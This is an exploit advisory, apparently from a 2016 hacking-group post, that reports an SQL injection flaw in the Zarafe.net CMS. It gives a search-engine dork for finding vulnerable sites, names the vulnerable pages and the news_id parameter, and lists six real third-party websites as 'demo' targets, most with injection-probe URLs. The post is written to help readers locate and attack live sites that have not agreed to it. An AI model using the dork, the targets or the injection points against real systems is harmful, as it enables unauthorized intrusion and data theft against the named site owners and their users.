`Exploit Title : Zarafe.net CMS SQL Injection Vulnerability
Exploit Author : Iran Cyber Security Group (ICSG)
Discovered By : 0x3a
Vendor HomePage : www.zarrafe.net
Version : 1.0 (Q1)
Date : 4 April, 2016
Tested On : Internet Explorer , Win 98
-----------------------------------------
SQL Injection :
For Finding Target First You Must Search The Dork And Select Your Target
Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت"
Vulnerable Page : news.php , news_view.php , product.php
Vulnerable Variable : news_id=
Demo :
novinsystemfars.ir/news_view.php?news_id=30'
pezeshkian-pharmacy.ir/news.php?news_id=3'
sdshiraz.com/news.php?news_id=8'
omidoor.com/products.php?product_category_code=12-15'
meysam71.ir/news.php?khabar_id=10'
etehadweb.ir/view_single_news.php?news_id=2
[+][+][+][+][+][+][+]
WWW.IRAN-CYBER.NET[+]
[+][+][+][+][+][+][+]
</0x3a>
`